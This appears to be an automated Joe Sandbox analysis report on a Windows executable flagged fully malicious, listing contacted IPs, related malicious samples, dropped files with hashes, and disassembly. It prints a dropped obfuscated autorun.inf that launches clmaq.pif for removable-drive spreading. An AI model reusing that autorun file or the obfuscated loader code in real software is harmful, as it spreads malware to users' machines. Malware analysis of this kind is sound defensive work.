                                                                                                      unknownBrazil
                                                                                                      52856NETWAYPROVEDORDEINTERNETLTDABRfalse
                                                                                                      188.214.36.212
                                                                                                      unknownRomania
                                                                                                      50886NETFIL-ASBULEVARDULRACOTEANUNR163AROfalse
                                                                                                      202.43.114.170
                                                                                                      unknownIndonesia
                                                                                                      45706TGG-AS-IDTeleGlobeGlobalPTIDfalse
                                                                                                      39.1.15.172
                                                                                                      unknownTaiwan; Republic of China (ROC)
                                                                                                      18182SONET-TWSonyNetworkTaiwanLimitedTWfalse
                                                                                                      113.11.62.14
                                                                                                      unknownBangladesh
                                                                                                      7565BDCOM-BDRangsNiluSquare5thFloorHouse75Road5ADfalse
                                                                                                      91.244.214.41
                                                                                                      unknownPoland
                                                                                                      59607TVK-HAJNOWKA-ASPLfalse
                                                                                                      190.37.212.191
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      84.108.73.183
                                                                                                      unknownIsrael
                                                                                                      8551BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneILfalse
                                                                                                      90.179.53.86
                                                                                                      unknownCzech Republic
                                                                                                      5610O2-CZECH-REPUBLICCZfalse
                                                                                                      188.241.130.50
                                                                                                      unknownRomania
                                                                                                      39737PRIME-TELECOM-ASROfalse
                                                                                                      118.69.52.216
                                                                                                      unknownViet Nam
                                                                                                      18403FPT-AS-APTheCorporationforFinancingPromotingTechnolofalse
                                                                                                      92.87.229.53
                                                                                                      unknownRomania
                                                                                                      9050RTDBucharestRomaniaROfalse
                                                                                                      37.142.67.58
                                                                                                      unknownIsrael
                                                                                                      12849HOTNET-ILAMS-IXAdminLANILfalse
                                                                                                      180.151.8.178
                                                                                                      unknownIndia
                                                                                                      10029SHYAMSPECTRA-ASSHYAMSPECTRAPVTLTDINfalse
                                                                                                      122.168.100.184
                                                                                                      unknownIndia
                                                                                                      24560AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServicesfalse
                                                                                                      189.13.136.81
                                                                                                      unknownBrazil
                                                                                                      7738TelemarNorteLesteSABRfalse
                                                                                                      89.122.185.62
                                                                                                      unknownRomania
                                                                                                      9050RTDBucharestRomaniaROfalse
                                                                                                      203.146.109.163
                                                                                                      unknownThailand
                                                                                                      4750CSLOXINFO-AS-APCSLOXINFOPUBLICCOMPANYLIMITEDTHfalse
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1563008
                                                                                                      Start date and time:2024-11-26 11:41:06 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 12m 37s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:8
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:35
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:RHxJqGoGFB.exe
                                                                                                      renamed because original name is a hash value
                                                                                                      Original Sample Name:2e6402a52ca73f3390ee4f703a1f509a3f2e05220034b1b36c013a083a1222bd.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.spre.evad.winEXE@4/7@0/100
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 11.1%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      • Number of executed functions: 70
                                                                                                      • Number of non-executed functions: 44
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 40.126.53.19, 20.190.181.0, 20.190.181.1, 20.190.181.6, 40.126.53.14, 40.126.53.11, 20.231.128.65, 40.126.53.21
                                                                                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                      • Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 2336 because it is empty
                                                                                                      • Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 2564 because it is empty
                                                                                                      • Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 3604 because it is empty
                                                                                                      • Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 3632 because it is empty
                                                                                                      • Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 5100 because it is empty
                                                                                                      • Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 5296 because it is empty
                                                                                                      • Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 5728 because it is empty
                                                                                                      • Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 5984 because it is empty
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                      • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                      • VT rate limit hit for: RHxJqGoGFB.exe
                                                                                                      TimeTypeDescription
                                                                                                      05:42:03API Interceptor3160880x Sleep call for process: RHxJqGoGFB.exe modified
                                                                                                      05:43:00API Interceptor1573x Sleep call for process: explorer.exe modified
                                                                                                      05:43:08API Interceptor745268x Sleep call for process: kgTxkwCMEtRJHvgbWwUB.exe modified
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      59.9.134.51zITHhYdak5.exeGet hashmaliciousSalityBrowse
                                                                                                        86.104.74.51uniswap-sniper-bot-with-gui Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 86.104.74.51:1224/keys
                                                                                                        uniswap-sniper-bot-with-gui Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 86.104.74.51:1224/pdown
                                                                                                        118.102.149.168r1kArkKGjW.exeGet hashmaliciousSalityBrowse
                                                                                                          No context
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CANTVServiciosVenezuelaVEfbot.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 201.248.15.125
                                                                                                          loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 201.249.153.62
                                                                                                          loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 201.249.141.84
                                                                                                          apep.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 186.95.232.130
                                                                                                          mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                          • 190.73.110.19
                                                                                                          m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 190.203.171.2
                                                                                                          x86.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 186.88.222.208
                                                                                                          i486.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 186.90.24.230
                                                                                                          spc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 186.91.98.121
                                                                                                          owari.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 201.249.189.53
                                                                                                          SKATTV-ASBGyVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 87.121.86.8
                                                                                                          https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzubGet hashmaliciousUnknownBrowse
                                                                                                          • 87.121.86.72
                                                                                                          http://cl4ycra.hgzcbqsqumhkfshql.com/kxosbfkveGet hashmaliciousUnknownBrowse
                                                                                                          • 87.121.86.72
                                                                                                          [EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.emlGet hashmaliciousUnknownBrowse
                                                                                                          • 87.121.86.72
                                                                                                          o4QEzeCniw.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 87.120.237.130
                                                                                                          Payment Order #00004647.exeGet hashmaliciousXWormBrowse
                                                                                                          • 87.121.86.8
                                                                                                          https://www.google.pl/url?url=http://msulrmrdjzsckgcdargfhi.com&nbq=tspwcyd&idbzok=wua&nbnak=ambmgo&lwf=vngmsem&q=amp/jdsra7r.ldn%C2%ADf%C2%ADpwlywydkjq%C2%ADuh%C2%ADf%C2%ADx%C2%AD.com/ufpd3kprb&xssr=zrcbvya&bhrswcv=abqvczic&clvu=wotwqzi&umasmoc=lhibfmio&tgek=sdcrupi&bpcjeel=qvmnlgnn&eign=czorcvw&txcfkja=lhtluzhk&zkmb=joyrkbk&mspp=frbfplx&ohrxtnn=emgsiphv&cbqf=eyyxrom&ngreupz=nzdjgaue&xtpz=fvqzpcq&spvwwuv=vijpphwi&wrjj=pklwpte&uuahvww=saaddjqzGet hashmaliciousUnknownBrowse
                                                                                                          • 87.121.86.72
                                                                                                          tfSYi9zABT.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 87.121.86.32
                                                                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                          • 94.156.116.236
                                                                                                          https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAgGet hashmaliciousUnknownBrowse
                                                                                                          • 87.121.86.72
                                                                                                          ONNET-AS-OWNMK7aodVUk6TV.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                          • 79.126.150.219
                                                                                                          SzEvaEcbe3.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 79.126.197.53
                                                                                                          DCwYFBy6z7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 217.16.70.151
                                                                                                          pk5zYdkgga.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 79.126.175.197
                                                                                                          NV7VTiMkEA.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 31.11.75.8
                                                                                                          L6i3RnSvpp.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                          • 79.126.185.93
                                                                                                          la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 79.126.175.183
                                                                                                          qJNrNXMSir.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 89.31.154.254
                                                                                                          7n89nEPSkV.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 89.31.154.226
                                                                                                          V1J7GFIwfY.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                          • 79.126.185.93
                                                                                                          No context
                                                                                                          No context
                                                                                                          Process:C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16384
                                                                                                          Entropy (8bit):1.8879452422736906
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:QJ93eOIuvE6OtBqxYrHYL0vxZ244SSP2Kxkxc:E9OOZvE6OtISrjOHF
                                                                                                          MD5:B1CD9C7F98E2272954BD7AFBBE9A95DE
                                                                                                          SHA1:88DD3DED5D71DFB6C3CA7D7BBD33BE8F6ABC8EF3
                                                                                                          SHA-256:D2D5FCE279D89753539645DD6C979390130A7680C8D9BE498598302311093E18
                                                                                                          SHA-512:DFD2D6B3AE74D2CE8BB8C6F2CC28F89A50DE19F72F9DA5C712EB4765A3B427D5779351B771B8E29A7DDE310682047702A6200280048ABDD2A39C380447757CA5
                                                                                                          Malicious:false
                                                                                                          Preview:regf........b.Q.7.................. ....0......1.h.2.t.x.y.e.w.y.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtmn....?..............................................................................................................................................................................................................................................................................................................................................8.y@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32768
                                                                                                          Entropy (8bit):1.4935352093671561
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:LJ8gN3eOIuvE6OtBqxYrHYL0vxZ244SSP2KxkxeEZ63XQuvE6OtBqxYrHYt:N8gNOOZvE6OtISrjOHbq6HxvE6OtIS
                                                                                                          MD5:673E944815FA15C1F4C691682262F054
                                                                                                          SHA1:36F3738428D80CB345AF031A6CCA9F5F64C6327C
                                                                                                          SHA-256:0B8C4E325051FAADC58C2F4B624546A44668CD37260F00CFEA54E1EC0F82F983
                                                                                                          SHA-512:854A46BABA361311947A20FA4F8A9FB7B62D34F502E644D3B68F8BCD18310D7A8FCCD1F0B3D37BF09813D1928C67B4469D4053736DF9B2AD034A3CD849ACED6B
                                                                                                          Malicious:false
                                                                                                          Preview:regf........b.Q.7.................. ....0......1.h.2.t.x.y.e.w.y.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtmn....?..............................................................................................................................................................................................................................................................................................................................................?.y@HvLE.............0.......p..!.....o..T........hbin................b.Q.7..........nk,.T...7..................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............vk......0...........PeekBadges..........[.]....^...?.......................V.....ey ........p...sk..x...x.......t.......H...X.............4.........?.......................
                                                                                                          Process:C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66561
                                                                                                          Entropy (8bit):7.978102284926885
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:kkLX3SApaVFvlkeAnV6I0yv8wBkRbKLtsIF8qhnA:kKSFvlkeICR2BHF7nA
                                                                                                          MD5:4FF9DB7B690B0CFCB29E3CCE048E7BC8
                                                                                                          SHA1:BC0A8A2C83C605AAC67F4A12DB74D5B22F0C9E21
                                                                                                          SHA-256:5F6B467070EB4AE0B688C16678D1CD331EE7445E32207AEF93408CD162DD2134
                                                                                                          SHA-512:6108C298F570DEFF4CF22864159DFDBA4AF484C13DFB8ABDD614682079AE4478F321CF3965566A3C6058C15FE8E69FA4D7A1FDFC64B5803FA4F277A6134A5735
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text............................. . ................................................................Z.n..~......U......E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66561
                                                                                                          Entropy (8bit):7.976923591712135
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:7R6HPA0d6EGDXyEMCDMsCDcapreYiML4EThDeQ:7R6A0ODXyv0/yeYnhDeQ
                                                                                                          MD5:115E26E7200846AF126F4752940AA705
                                                                                                          SHA1:7D1F3CCBE259FED0D46CC52A04F0C3BC7D3F6405
                                                                                                          SHA-256:E13E15B1EAF875A7FDA5A4223D38B818C73FF6351C6526C928BAED52A8398984
                                                                                                          SHA-512:781DA9C91EA91CE6F2CDD8ED26AA6EB78E9F9B41E6D384E65B92303A7A7ADD27B9ABC6B7B15818C99AB9F4C854F8CAC0917FBB000C211FEA7FE707CFFBC21BF5
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text............................... ................................................................].n..~.....W.E.....E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          File Type:Windows SYSTEM.INI
                                                                                                          Category:dropped
                                                                                                          Size (bytes):255
                                                                                                          Entropy (8bit):5.2790341502364315
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtPTy:F4Yv7yk3OUBq82wqFtPm
                                                                                                          MD5:3B542397CE5A0BFBFBBA29C43E4862FA
                                                                                                          SHA1:AEC6431EA677573EE94C05541E0DEF5E38E0760E
                                                                                                          SHA-256:22BA8180B5543937B0428061FC3D931D42E84171655C56F728231D262DAD0B75
                                                                                                          SHA-512:E7B20D5754BFEE417BC8F009E9F2ABE8848807C845C68C18FBE8B829BB4222ADE6BB7AA2FC58AE08FA1418C07C7ED0DF07FBB5848099C3D7C721D1FDC8421136
                                                                                                          Malicious:false
                                                                                                          Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=44775622570..
                                                                                                          Process:C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          File Type:Microsoft Windows Autorun file
                                                                                                          Category:dropped
                                                                                                          Size (bytes):338
                                                                                                          Entropy (8bit):5.573273093294924
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:bLQRo7zusYQZAmppSQwpmK+mAQZ7SmmuiJXM7+SCu0NHSmRMzVwmW:bkRo7z5DYZ2QVSBuiJXsDCxSTzGJ
                                                                                                          MD5:22428B253540DC5B22BE3F5769CD228B
                                                                                                          SHA1:D6F385991EF446F9127A3F9DDAD49A18CC6BDA7B
                                                                                                          SHA-256:CC9F7F724FEFE86D9719A8838E5B9BBACB7E74A907B602233BEEFC53C377B04E
                                                                                                          SHA-512:22F46683B4DF038586EA633F30B8A52A0C73275A787680A760028CA6979C1433A20EA3FF2AFA6AF3158413D2CB1B7753D6F50D2D105B2E36F49008CAB2097450
                                                                                                          Malicious:true
                                                                                                          Preview:[AutoRun]..;WUtkSxoskaeFSrnum CAAR PnxKhn Bpkw..sheLL\opEn\dEfault=1..;iiUwciRycBikUmSITDMqfrhcxbdtFthAdagekVJfnStay BYQqi..opeN = clmaq.pif..;lXFinwqgKxhUClF jcFD ..shell\ExploRe\coMmand =clmaq.pif..;qRNmskpjsMrnUg dWTNubSeEgpCQVhnu fEYeGHCmLdyHcdAtXaj SMchnuisYKfdfuJC ..Shell\OPEn\ComMaNd =clmaq.pif..sHElL\AutopLay\coMmand=clmaq.pif..
                                                                                                          Process:C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:modified
                                                                                                          Size (bytes):99328
                                                                                                          Entropy (8bit):7.9742065590857205
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:7R6HPA0d6EGDXyEMCDMsCDcapreYiML4EThDeVfJgX/cBvJeD6w:7R6A0ODXyv0/yeYnhDexy/c5J/w
                                                                                                          MD5:FB2A7CE9B3AF61C819495A075CF6FDC4
                                                                                                          SHA1:42A6618175EB54AC179BD669C93D785F0DDAE994
                                                                                                          SHA-256:CF2237015DA36DF32AC5ECAB94B7A3A415FAFAE7CD56ED8EFA1C72D8581EF26F
                                                                                                          SHA-512:A9135510F0EAE6C2A25DCF01C236ED62E585CD3473CA02E7070882C0F00129026013C011BE35CB38EB701D3C146CC978A6853FE32579613BB686486C762C5FEF
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text............................... ................................................................].n..~.....W.E.....E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................
                                                                                                          File type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Entropy (8bit):7.968859719295659
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • VXD Driver (31/22) 0.00%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:RHxJqGoGFB.exe
                                                                                                          File size:68'608 bytes
                                                                                                          MD5:4f7fa0b66a6e153089ab00199b04356b
                                                                                                          SHA1:7c2a6d1a21501502e2186ca493a1069909bba703
                                                                                                          SHA256:2e6402a52ca73f3390ee4f703a1f509a3f2e05220034b1b36c013a083a1222bd
                                                                                                          SHA512:2715aaa37524fd853fa2ce8e93ff30ae516cccb2f6be0e6170f1bf75ab7822ca64c385e43f45310acf6691ac138351e995d37d90e41ca1176515c8c31395079e
                                                                                                          SSDEEP:1536:1irGdfpQy7sjbH9MSBKrY7zVZft5HBhw+QiKWs7BKlI1JdGtFZqV:1iGRpHYvGSL3/ftiF7BvndGpU
                                                                                                          TLSH:4A6302A3BF01436CF9004FBF1645896DE1D5D85DEEB12F73A5ADCDC2A052718832AD46
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................ ....@..........................0.............................................
                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                          Entrypoint:0x4012e0
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows cui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                          DLL Characteristics:
                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:c62e7d95805a40859204937c35ee3c22
                                                                                                          Instruction
                                                                                                          bswap esi
                                                                                                          neg ah
                                                                                                          test ebx, ebp
                                                                                                          add ebp, 00046C5Bh
                                                                                                          mov cl, ah
                                                                                                          sub ebp, 00043D90h
                                                                                                          cmp cl, FFFFFFFEh
                                                                                                          mov esi, 561193B2h
                                                                                                          imul eax, esi
                                                                                                          lea ecx, dword ptr [849681C0h]
                                                                                                          neg ah
                                                                                                          mov esi, 000005BDh
                                                                                                          and eax, 18B5D1CDh
                                                                                                          add esi, 00000148h
                                                                                                          test cl, FFFFFFEDh
                                                                                                          xor al, A0h
                                                                                                          sub esi, 00000453h
                                                                                                          cmp ebx, 00005962h
                                                                                                          jnc 00007F2E44D9D7BFh
                                                                                                          test ecx, B65C5898h
                                                                                                          sbb al, 66h
                                                                                                          inc ebp
                                                                                                          mov dh, 0000004Fh
                                                                                                          add esi, 00000452h
                                                                                                          jnc 00007F2E44D9D7B4h
                                                                                                          test cl, bh
                                                                                                          bswap ebx
                                                                                                          cmp esi, 000002BAh
                                                                                                          jnc 00007F2E44D9D77Eh
                                                                                                          push edx
                                                                                                          push eax
                                                                                                          or al, ch
                                                                                                          call 00007F2E44D9D7CEh
                                                                                                          js 00007F2E44D9D7BBh
                                                                                                          add eax, FF75D89Ah
                                                                                                          mov ebp, ebp
                                                                                                          test edx, esi
                                                                                                          add esi, 000E732Ah
                                                                                                          mov dl, D6h
                                                                                                          sub esi, 000D8EAEh
                                                                                                          test edi, 0C1660B9h
                                                                                                          mov edi, 411A94DEh
                                                                                                          test edx, ecx
                                                                                                          cmp eax, 0000FA53h
                                                                                                          pop ebx
                                                                                                          cmp esi, ebx
                                                                                                          jc 00007F2E44D9D7B4h
                                                                                                          add edi, edi
                                                                                                          mov dl, ch
                                                                                                          cmp ecx, ecx
                                                                                                          movd mm4, ebx
                                                                                                          movd edx, mm4
                                                                                                          test edi, 4F195B47h
                                                                                                          mov edi, 5AED90EEh
                                                                                                          mov ah, ch
                                                                                                          adc eax, ecx
                                                                                                          lea ebx, dword ptr [FFFDEFBCh]
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x24600x28.data
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
